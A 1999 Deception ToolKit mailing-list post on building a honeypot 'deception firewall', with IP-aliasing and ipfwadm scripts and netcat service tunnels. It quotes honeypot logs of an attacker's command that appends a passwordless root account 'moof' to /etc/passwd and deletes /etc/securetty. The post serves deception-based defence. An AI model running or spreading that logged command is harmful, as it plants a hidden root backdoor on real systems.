From: dtk@all.net
Reply-to: dtk@all.net
Organization: Deception ToolKit Mailing List
Subject: DTK Mailing List 19990627
<pre>---------------------------------------------
From fred at all.net@all.net  Sun Jun 27 08:53:23 1999
Subject: The Deception Firewall with DTK
Date: Sun, 27 Jun 1999 08:53:13 -0700 (PDT)

I have been experimenting with the use of DTK to create large scale
deceptions and I thought the readers of the mailing list would be
interested in the preliminary results and how you can use deception as a
key component in a firewall - or as a large-scale detector.

I have done this for Redhat and Slackware Linux only.  If others care to
provide versions for non-linux boxes, please provide details to the
list. 

The goal is to provide deceptions for all unused computers and services
in a class C network (class B coming soon?) so that - from a single
Linux box - we can fill the address space, creating far higher odds of
hitting a deception.  We then (optionally) react to detections by making
everything a deception for that attacker for a period of time.  Here's
how it goes:

1) Make a list of all the IP addresses and legitimate outside services for
your class C network.

2) Configure a Linux box with 2 network cards - as a firewall in front
of the class C network of interest.

3) Configure and get DTK running on the firewall so that all outside
services run through DTK (via TCP wrappers).

4) Rig the Linux box so that it listens to all of the IP addreses in the
class C address range.  This is done by adding 253 entries to the
/etc/sysconfig/network-scripts directory - here's an aproximate script
to do it:

CLASSC="10.0.0"
for i in 1 2 3 4 5 6 7 8 9 10 ... 250 251 252 253 254
do
echo "DEVICE=eth0:${i}
IPADDR=${CLASSC}.${i}
NETMASK=255.255.255.0
NETWORK=${CLASSC}.0
BROADCAST=${CLASSC}.255
ONBOOT=yes" > /etc/sysconfig/network-scripts/ifcfg-eth0:${i}
echo -n "${i} "
done
echo "Done"

Note: I tried this for more than one class C and Linux is unable to
handle device names beyond <real-device>:[0-9][0-9][0-9] - pity - I was
anxious to do a class B network next.  I think this one can be fixed -
however.

5) Tunnel legitimate services through the firewall using netcat by
placing entries in the beginning of your /etc/hosts.allow file like this:

	telnet:	from-ip>to-ip:	twist /usr/local/bin/nc -w 3 <internal-IP> 23

Note 1: This assumes you have the version of tcp wrappers with the
fix for RedHat that allows the twist comand to work properly and have
recompiled is with the proper options to allow the twist command to
operate properly. 

Note 2: This assumes you have the specially modified version of
TCP-wrappers that allows you to determine the 'TO' address as well as
the 'FROM' address in your deliberations. We are working on one...

6) Use ipfwadm (or ipchains) to limit the services based on <from-ip> <to-ip>
pairs so that you only emulate the proper services for the proper IP addresses.
Her is an example script for a class C subset of the 10 net.

#!/bin/sh
# firewall script for deceptions

NT="`count 128 250`"
NTPORTS="123 124 125 80 12345 12346 31337"
UNIX="`count 1 63` `count 65 127`"
# the count function counts the integers from start to end - replace with lists if you don't have count
UNIXPORTS="11 17 21 22 23 25 80 110 365 512 1024 6000"
ANY="0.0.0.0/0"
ClassC="10.0.7"
RealIP="10.0.7.64"

echo -n "Init Firewall..."
/sbin/ipfwadm -I -f
/sbin/ipfwadm -O -f
/sbin/ipfwadm -F -f

echo -n "Forwarding Off..."
/sbin/ipfwadm -F -p deny

# default deny for all but the real IP address
/sbin/ipfwadm -I -p deny
/sbin/ipfwadm -I -a accept -S $ANY -D ${RealIP}/24 -W eth0

echo;echo -n "Doing NT..."
for i in $NT
	do
	echo -n "$i "
	for j in $NTPORTS
		do
		# only allow NT ports on NT emulators
		/sbin/ipfwadm -I -P tcp -a accept -S $ANY -D ${ClassC}${i} $j -W eth0
		/sbin/ipfwadm -I -P tcp -a deny -S $ANY -D ${ClassC}${i} -W eth0
	# only allow windows-like ports...
	done
done
echo;echo -n "Doing Unix..."
for i in $UNIX
	do
	echo -n "$i "
	for j in $UNIXPORTS
		do
		# only allow Unix ports on Unix emulators
#		echo -n "$i/$j "
		/sbin/ipfwadm -I -P tcp -a accept -S $ANY -D ${ClassC}${i} $j -W eth0
		/sbin/ipfwadm -I -P all -a deny -S $ANY -D ${ClassC}${i} -W eth0
	done
done
echo;echo "Deception firewalling done"

7) Rig the deception scripts (####.response) so that whenever you get a
detection at infocon 3 or above (set your own level if you like), you
add a line to the start of /etc/hosts.allow to cover the tunnels placed
in step 5 above with deceptions from the source addresses of the probes.
This can be done with DTK's 'special' operator.

The net effect is a network with the following proeprties:

1) The address space and the service space is fully populated, so that
anything they try seems to be available for use.

2) Whenever they probe more deeply, the odds are heavily in favor of
hitting a forged service - assuming they do not have detailed knowledge
of the network.

3) When they try to hit a forged service beyond a light scan (you set
the level), no legitimate services remain and the whole network becomes
a deception.

4) You automatically correlate all attempts across the whole class C
network and automatically and (just about) instantly respond to any deep
probe.

5) Legitimate services continue unhindered in any way.  Indeed, the
firewall tends to prevent otherwise successful denial of service attacks
against many of these machines. 

I've been testing this and it seems to work for now. Today - a class
B network - tomorrow - the whole Internet deception!!!

FC

========================================================================
Also from the latest dtk logs...

'198.143.200.52', '13392', '10752', '1999/06/24 17:37:35', '18023', '275', '1', 'listen.pl', 'S0', 'R-Peace', 'Init'
'198.143.200.52', '13392', '10752', '1999/06/24 17:37:36', '18023', '275', '1', 'listen.pl', 'S', 'RPeace-Peace', 'trap '' SIGALRM SIGTRAP'
'198.143.200.52', '13392', '10752', '1999/06/24 17:37:36', '18023', '275', '1', 'listen.pl', 'S', 'RPeace-Peace', 'PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH'
'198.143.200.52', '13392', '10752', '1999/06/24 17:37:36', '18023', '275', '1', 'listen.pl', 'S', 'RPeace-Peace', '/usr/sbin/rpc.mountd </dev/null'
'198.143.200.52', '13392', '10752', '1999/06/24 17:37:36', '18023', '275', '1', 'listen.pl', 'S', 'RPeace-Peace', '/bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash' >>/etc/passwd;rm -rf /etc/securetty;exit;'

Then...

'209.24.217.162', '23', '23', '1999/06/27 00:59:35', '19648', '19648', '1', 'Telnet.pl', 'S0', 'R-Peace', ''
'209.24.217.162', '23', '23', '1999/06/27 00:59:38', '19648', '19648', '1', 'Telnet.pl', 'S1', 'RPeace-Peace', 'moof'
'38.29.35.116', '23', '23', '1999/06/28 13:58:29', '24863', '24863', '1', 'Telnet.pl', 'S0', 'R-Peace', ''
'38.29.35.116', '23', '23', '1999/06/28 13:58:31', '24863', '24863', '1', 'Telnet.pl', 'S1', 'RPeace-Peace', 'moof'

I have rigged moof to allow apparent entry - and am considering putting
up a special box just to see what they do once they break in.

FC
---------------------------------------------